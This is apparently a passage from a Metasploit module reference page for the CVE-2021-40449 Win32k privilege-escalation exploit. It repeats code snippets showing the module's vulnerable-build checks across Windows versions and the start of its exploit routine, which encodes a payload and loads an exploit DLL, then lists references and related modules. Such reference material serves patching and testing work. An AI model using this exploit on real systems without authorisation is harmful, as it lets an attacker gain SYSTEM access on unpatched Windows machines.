112: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909
113: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
114: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903
Vulnerable Windows 10 20H1 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 20H1 build detected!" error message:
106: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1
107: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
108: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2
109: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
110: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1
111: return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
112: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909
113: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
114: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903
115: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
116: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809
Vulnerable Windows 10 v1909 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1909 build detected!" error message:
108: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2
109: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
110: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1
111: return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
112: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909
113: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
114: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903
115: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
116: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809
117: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
118: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803
Vulnerable Windows 10 v1903 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1903 build detected!" error message:
110: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1
111: return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
112: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909
113: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
114: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903
115: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
116: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809
117: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
118: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803
119: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
120: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709
Vulnerable Windows 10 v1809 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1809 build detected!" error message:
112: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909
113: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
114: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903
115: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
116: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809
117: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
118: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803
119: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
120: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709
121: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
122: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703
Vulnerable Windows 10 v1803 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1803 build detected!" error message:
114: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.9999999')) # Windows 10 v1903
115: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
116: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809
117: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
118: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803
119: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
120: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709
121: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
122: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703
123: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
124: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607
Vulnerable Windows 10 v1709 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1709 build detected!" error message:
116: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.2237')) # Windows 10 v1809
117: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
118: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803
119: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
120: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709
121: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
122: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703
123: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
124: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607
125: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
126: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511
Vulnerable Windows 10 v1703 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1703 build detected!" error message:
118: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.999999')) # Windows 10 v1803
119: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
120: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709
121: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
122: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703
123: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
124: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607
125: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
126: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511
127: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
128: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507
Vulnerable Windows 10 v1607 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1607 build detected!" error message:
120: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) && (build_num_gemversion < Rex::Version.new('10.0.16299.999999')) # Windows 10 v1709
121: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
122: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703
123: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
124: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607
125: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
126: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511
127: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
128: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507
129: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
130: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2
Vulnerable Windows 10 v1511 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1511 build detected!" error message:
122: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) && (build_num_gemversion < Rex::Version.new('10.0.15063.999999')) # Windows 10 v1703
123: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
124: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607
125: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
126: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511
127: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
128: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507
129: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
130: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2
131: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
132: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012
Vulnerable Windows 10 v1507 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1507 build detected!" error message:
124: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.4704')) # Windows 10 v1607
125: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
126: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511
127: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
128: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507
129: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
130: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2
131: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
132: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012
133: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
134: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2
Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!" error message:
126: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.9999999')) # Windows 10 v1511
127: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
128: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507
129: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
130: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2
131: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
132: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012
133: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
134: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2
135: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
136: elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2
Vulnerable Windows 8/Windows Server 2012 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 8/Windows Server 2012 build detected!" error message:
128: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.19086')) # Windows 10 v1507
129: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
130: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2
131: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
132: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012
133: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
134: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2
135: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
136: elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2
137: return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')
138: else
Vulnerable Windows 7/Windows Server 2008 R2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 7/Windows Server 2008 R2 build detected!" error message:
130: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.20144')) # Windows 8.1/Windows Server 2012 R2
131: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
132: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012
133: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
134: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2
135: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
136: elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2
137: return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')
138: else
139: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
140: end
Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!" error message:
132: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.23489')) # Windows 8/Windows Server 2012
133: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
134: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2
135: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
136: elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2
137: return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')
138: else
139: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
140: end
141: end
142:
The build number of the target machine does not appear to be a vulnerable version!
Here is a relevant code snippet related to the "The build number of the target machine does not appear to be a vulnerable version!" error message:
134: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.25740')) # Windows 7/Windows Server 2008 R2
135: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
136: elsif (build_num_gemversion >= Rex::Version.new('6.0.6003.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.21251')) # Windows Server 2008/Windows Server 2008 SP2
137: return CheckCode::Appears('Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!')
138: else
139: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
140: end
141: end
142:
143: def exploit
144: if is_system?
Session is already elevated
Here is a relevant code snippet related to the "Session is already elevated" error message:
140: end
141: end
142:
143: def exploit
144: if is_system?
145: fail_with(Failure::None, 'Session is already elevated')
146: end
147:
148: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
149: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
150: elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
Running against WOW64 is not supported
Here is a relevant code snippet related to the "Running against WOW64 is not supported" error message:
144: if is_system?
145: fail_with(Failure::None, 'Session is already elevated')
146: end
147:
148: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
149: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
150: elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
151: fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
152: elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
153: fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
154: end
Session host is x64, but the target is specified as x86
Here is a relevant code snippet related to the "Session host is x64, but the target is specified as x86" error message:
146: end
147:
148: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
149: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
150: elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
151: fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
152: elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
153: fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
154: end
155:
156: encoded_payload = payload.encoded
Session host is x86, but the target is specified as x64
Here is a relevant code snippet related to the "Session host is x86, but the target is specified as x64" error message:
148: if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
149: fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
150: elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
151: fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
152: elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
153: fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
154: end
155:
156: encoded_payload = payload.encoded
157: execute_dll(
158: ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),
Go back to menu.
Related Pull Requests
- #15847 Merged Pull Request: Fix bug in tab completion in case-sensitive situations
- #15820 Merged Pull Request: Fix named pipe pivoting
- #15834 Merged Pull Request: Add Exploit for CVE-2021-40449
- #15846 Merged Pull Request: Tab-complete for file downloads
- #15802 Merged Pull Request: Add Exploit for CVE-2021-38648 (OMIGOD LPE)
- #15844 Merged Pull Request: Add in new definitions to definitions.h
- #15845 Merged Pull Request: Don't getsystem if we are already SYSTEM
- #15840 Merged Pull Request: Give warning rather than failure when running DCSync as SYSTEM
- #15838 Merged Pull Request: sap_router_portscanner: rename validate function
- #15748 Merged Pull Request: Run metasploit in Kubernetes
- #15818 Merged Pull Request: Fix Partial WebSocket Reads
References
- CVE-2021-40449
- https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/
- https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ
- https://github.com/KaLendsi/CVE-2021-40449-Exploit
- https://github.com/ly4k/CallbackHell
See Also
Check also the following modules related to this module:
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/local/cve_2018_8453_win32k_priv_esc
- exploit/windows/local/cve_2019_1458_wizardopium
- exploit/windows/local/cve_2020_0668_service_tracing
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/cve_2020_0796_smbghost
- exploit/windows/local/cve_2020_1048_printerdemon
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/windows/local/cve_2020_1313_system_orchestrator
- exploit/windows/local/cve_2020_1337_printerdemon
- exploit/windows/local/cve_2020_17136
- exploit/windows/local/cve_2021_1732_win32k
- exploit/windows/local/cve_2021_21551_dbutil_memmove
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/local/cve_2022_26904_superprofile
- exploit/windows/dcerpc/cve_2021_1675_printnightmare
- exploit/windows/fileformat/cve_2017_8464_lnk_rce
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
- exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- exploit/windows/smb/cve_2020_0796_smbghost
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/cve_2021_3493_overlayfs
- exploit/linux/local/cve_2021_38648_omigod
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/local/cve_2022_0995_watch_queue
- exploit/linux/misc/cve_2020_13160_anydesk
- exploit/linux/misc/cve_2021_38647_omigod
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/sap/cve_2020_6207_solman_rs
Related Nessus plugins:
- KB5006672: Windows 10 Version 1809 and Windows Server 2019 Security Update (October 2021)
- KB5006699: Windows Server 2022 Security Update (October 2021)
- KB5006670: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 October 2021 Security Update
- KB5006669: Windows 10 Version 1607 and Windows Server 2016 Security Update (October 2021)
- KB5006728: Windows 7 and Windows Server 2008 R2 Security Update (October 2021)
- KB5006732: Windows Server 2012 Security Update (October 2021)
- KB5006667: Windows 10 version 1909 Security Update (October 2021)
- KB5006729: Windows Server 2012 R2 Security Update (October 2021)
- KB5006675: WWindows 10 version 1507 LTS Security Update (October 2021)
- KB5006674: Windows 11 Security Update (October 2021)
Authors
- IronHusky
- Costin Raiu
- Boris Larin
- Red Raindrop Team of Qi'anxin Threat Intelligence Center
- KaLendsi
- ly4k
- Grant Willcox
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.